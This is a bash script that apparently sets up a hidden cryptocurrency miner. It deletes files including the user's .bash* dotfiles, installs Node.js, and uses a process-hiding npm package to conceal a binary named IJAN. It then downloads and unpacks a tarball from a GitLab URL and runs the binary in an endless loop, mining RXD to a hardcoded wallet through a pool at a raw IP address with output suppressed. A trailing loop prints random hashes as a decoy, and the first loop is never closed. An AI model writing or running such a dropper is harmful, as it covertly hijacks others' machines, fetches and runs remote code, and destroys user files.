#!/bin/bash
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash*
cd ~/
mkdir .lib
cd .lib
rm -rf *
sudo apt update -y
sudo apt install gcc -y
curl -sL https://deb.nodesource.com/setup_16.x | sudo -E bash
apt install nodejs -y
npm install -g npm@8.18.0 -y && npm i -g node-process-hider && ph add IJAN
rm -f IJAN && wget -q 'https://gitlab.com/zenardozhe/jual/-/raw/main/TT.tar.gz' && tar -xvf TT.tar.gz
while true; do timeout 5m ./IJAN -coin RXD -P 162qMK5wiDbo2HiCcbK2F7yARvcwBBHqPW.$(shuf -n 1 -i 1-6)-RXD@164.90.140.83:80 -PP 5 -nocolor -PRT 0 -luck >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
